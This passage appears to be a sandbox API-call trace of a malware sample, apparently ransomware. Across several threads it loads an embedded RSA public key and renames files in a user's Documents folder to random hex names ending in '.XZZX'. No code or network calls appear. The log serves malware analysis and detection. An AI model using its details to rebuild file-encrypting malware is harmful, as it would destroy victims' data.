0x0 [0230.138] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A9467A821967F20598E66B961D60D64D.XZZX") returned 81 [0230.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0230.138] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\474351880C4A826C795C87180F2566B4.XZZX") returned 81 [0230.138] StrStrW (lpFirst="A9467A821967F20598E66B961D60D64D.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 884 os_tid = 0x10d4 [0230.294] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0230.294] lstrcpyW (in: lpString1=0x2daf460, lpString2="AF137D37318F929FC9EC733B358876E7.XZZX" | out: lpString1="AF137D37318F929FC9EC733B358876E7.XZZX") returned="AF137D37318F929FC9EC733B358876E7.XZZX" [0230.294] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0230.294] SetErrorMode (uMode=0x1) returned 0x1 [0230.294] lstrcpyW (in: lpString1=0x2daf860, lpString2="AF137D37318F929FC9EC733B358876E7.XZZX" | out: lpString1="AF137D37318F929FC9EC733B358876E7.XZZX") returned="AF137D37318F929FC9EC733B358876E7.XZZX" [0230.294] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x8f5a292e, Data2=0xdefd, Data3=0x4de9, Data4=([0]=0xa2, [1]=0xab, [2]=0x7c, [3]=0x49, [4]=0xe5, [5]=0xfc, [6]=0x52, [7]=0x6))) returned 0x0 [0230.294] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AF137D37318F929FC9EC733B358876E7.XZZX") returned 81 [0230.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0230.294] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DBD0967643DD0D458F5A292E46B7F18D.XZZX") returned 81 [0230.294] StrStrW (lpFirst="AF137D37318F929FC9EC733B358876E7.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 885 os_tid = 0x10d8 [0230.450] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0230.450] lstrcpyW (in: lpString1=0x2daf460, lpString2="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX" | out: lpString1="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX") returned="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX" [0230.450] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0230.450] SetErrorMode (uMode=0x1) returned 0x1 [0230.450] lstrcpyW (in: lpString1=0x2daf860, lpString2="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX" | out: lpString1="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX") returned="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX" [0230.450] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x6bdbbb6c, Data2=0xa7ad, Data3=0x4de5, Data4=([0]=0xa5, [1]=0x7a, [2]=0x1e, [3]=0xef, [4]=0xd2, [5]=0xf5, [6]=0x71, [7]=0x8))) returned 0x0 [0230.450] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0407B59334CDCAF9E2CA2E33779C0F7.XZZX") returned 81 [0230.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0230.450] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3AC11BFC330506C16BDBBB6C35DFEB09.XZZX") returned 81 [0230.450] StrStrW (lpFirst="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 886 os_tid = 0x10dc [0230.607] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0230.607] lstrcpyW (in: lpString1=0x2daf460, lpString2="B34C34B41EC5682F9CB9477C22BE4C77.XZZX" | out: lpString1="B34C34B41EC5682F9CB9477C22BE4C77.XZZX") returned="B34C34B41EC5682F9CB9477C22BE4C77.XZZX" [0230.607] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0230.607] SetErrorMode (uMode=0x1) returned 0x1 [0230.607] lstrcpyW (in: lpString1=0x2daf860, lpString2="B34C34B41EC5682F9CB9477C22BE4C77.XZZX" | out: lpString1="B34C34B41EC5682F9CB9477C22BE4C77.XZZX") returned="B34C34B41EC5682F9CB9477C22BE4C77.XZZX" [0230.607] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xaa87cd35, Data2=0x6df3, Data3=0x4261, Data4=([0]=0x92, [1]=0x51, [2]=0x83, [3]=0xf3, [4]=0x17, [5]=0xc9, [6]=0xd2, [7]=0x94))) returned 0x0 [0230.607] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B34C34B41EC5682F9CB9477C22BE4C77.XZZX") returned 81 [0230.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0230.607] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B1475A4F1C824F13AA87CD351F5D335B.XZZX") returned 81 [0230.607] StrStrW (lpFirst="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 887 os_tid = 0x10e0 [0230.761] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0230.762] lstrcpyW (in: lpString1=0x2daf460, lpString2="B8F78CE2222013C8FF50021B265CF810.XZZX" | out: lpString1="B8F78CE2222013C8FF50021B265CF810.XZZX") returned="B8F78CE2222013C8FF50021B265CF810.XZZX" [0230.762] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0230.762] SetErrorMode (uMode=0x1) returned 0x1 [0230.762] lstrcpyW (in: lpString1=0x2daf860, lpString2="B8F78CE2222013C8FF50021B265CF810.XZZX" | out: lpString1="B8F78CE2222013C8FF50021B265CF810.XZZX") returned="B8F78CE2222013C8FF50021B265CF810.XZZX" [0230.762] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x5d2f8292, Data2=0xa225, Data3=0x4991, Data4=([0]=0x9b, [1]=0x20, [2]=0x3b, [3]=0x1c, [4]=0x83, [5]=0x8e, [6]=0xd9, [7]=0xbe))) returned 0x0 [0230.762] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B8F78CE2222013C8FF50021B265CF810.XZZX") returned 81 [0230.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0230.762] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\887E431A2E9863F55D2F82923173483D.XZZX") returned 81 [0230.762] StrStrW (lpFirst="B8F78CE2222013C8FF50021B265CF810.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 888 os_tid = 0x10e4 [0230.918] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0230.918] lstrcpyW (in: lpString1=0x2daf460, lpString2="BB3CCCBC286641FC324D4A8B2C932644.XZZX" | out: lpString1="BB3CCCBC286641FC324D4A8B2C932644.XZZX") returned="BB3CCCBC286641FC324D4A8B2C932644.XZZX" [0230.918] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0230.918] SetErrorMode (uMode=0x1) returned 0x1 [0230.918] lstrcpyW (in: lpString1=0x2daf860, lpString2="BB3CCCBC286641FC324D4A8B2C932644.XZZX" | out: lpString1="BB3CCCBC286641FC324D4A8B2C932644.XZZX") returned="BB3CCCBC286641FC324D4A8B2C932644.XZZX" [0230.918] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x3786648f, Data2=0x98f4, Data3=0x40ff, Data4=([0]=0xbe, [1]=0x4e, [2]=0x7f, [3]=0x56, [4]=0xe, [5]=0x0, [6]=0x3e, [7]=0xbb))) returned 0x0 [0230.918] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BB3CCCBC286641FC324D4A8B2C932644.XZZX") returned 81 [0230.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0230.918] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B7CCC04C26D55B0C3786648F29B03F54.XZZX") returned 81 [0230.918] StrStrW (lpFirst="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 889 os_tid = 0x10e8 [0231.076] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0231.076] lstrcpyW (in: lpString1=0x2daf460, lpString2="BE3510781871306D58A0B1081C6A14B5.XZZX" | out: lpString1="BE3510781871306D58A0B1081C6A14B5.XZZX") returned="BE3510781871306D58A0B1081C6A14B5.XZZX" [0231.077] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0231.077] SetErrorMode (uMode=0x1) returned 0x1 [0231.077] lstrcpyW (in: lpString1=0x2daf860, lpString2="BE3510781871306D58A0B1081C6A14B5.XZZX" | out: lpString1="BE3510781871306D58A0B1081C6A14B5.XZZX") returned="BE3510781871306D58A0B1081C6A14B5.XZZX" [0231.077] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x285a1ced, Data2=0xff8, Data3=0x4e6c, Data4=([0]=0xb1, [1]=0xa8, [2]=0x68, [3]=0x2b, [4]=0x53, [5]=0xff, [6]=0xa0, [7]=0x28))) returned 0x0 [0231.077] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BE3510781871306D58A0B1081C6A14B5.XZZX") returned 81 [0231.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0231.077] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5EFDE89804E44CA0285A1CED07BF30E8.XZZX") returned 81 [0231.077] StrStrW (lpFirst="BE3510781871306D58A0B1081C6A14B5.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 890 os_tid = 0x10ec [0231.229] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0231.229] lstrcpyW (in: lpString1=0x2daf460, lpString2="D4132CC416066089C413F0DC1A1E44D1.XZZX" | out: lpString1="D4132CC416066089C413F0DC1A1E44D1.XZZX") returned="D4132CC416066089C413F0DC1A1E44D1.XZZX" [0231.229] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0231.229] SetErrorMode (uMode=0x1) returned 0x1 [0231.229] lstrcpyW (in: lpString1=0x2daf860, lpString2="D4132CC416066089C413F0DC1A1E44D1.XZZX" | out: lpString1="D4132CC416066089C413F0DC1A1E44D1.XZZX") returned="D4132CC416066089C413F0DC1A1E44D1.XZZX" [0231.229] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xbbd45aa9, Data2=0x951f, Data3=0x4c1f, Data4=([0]=0xad, [1]=0xb3, [2]=0x45, [3]=0x90, [4]=0x6e, [5]=0x24, [6]=0x6a, [7]=0x95))) returned 0x0 [0231.229] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D4132CC416066089C413F0DC1A1E44D1.XZZX") returned 81 [0231.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0231.229] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\577B57772C5742C1BBD45AA92F322709.XZZX") returned 81 [0231.230] StrStrW (lpFirst="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 891 os_tid = 0x10f0 [0231.386] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0231.386] lstrcpyW (in: lpString1=0x2daf460, lpString2="D7DDFDC32CF119C87B5BFA373108FE10.XZZX" | out: lpString1="D7DDFDC32CF119C87B5BFA373108FE10.XZZX") returned="D7DDFDC32CF119C87B5BFA373108FE10.XZZX" [0231.386] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0231.386] SetErrorMode (uMode=0x1) returned 0x1 [0231.386] lstrcpyW (in: lpString1=0x2daf860, lpString2="D7DDFDC32CF119C87B5BFA373108FE10.XZZX" | out: lpString1="D7DDFDC32CF119C87B5BFA373108FE10.XZZX") returned="D7DDFDC32CF119C87B5BFA373108FE10.XZZX" [0231.386] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x6fac0205, Data2=0xaf8e, Data3=0x45c4, Data4=([0]=0x92, [1]=0x7b, [2]=0x92, [3]=0xa9, [4]=0xd8, [5]=0x8b, [6]=0x4a, [7]=0x2e))) returned 0x0 [0231.386] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D7DDFDC32CF119C87B5BFA373108FE10.XZZX") returned 81 [0231.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0231.386] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\86CA89C62FD7AEB86FAC020532B29300.XZZX") returned 81 [0231.386] StrStrW (lpFirst="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 892 os_tid = 0x10f4 [0231.542] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 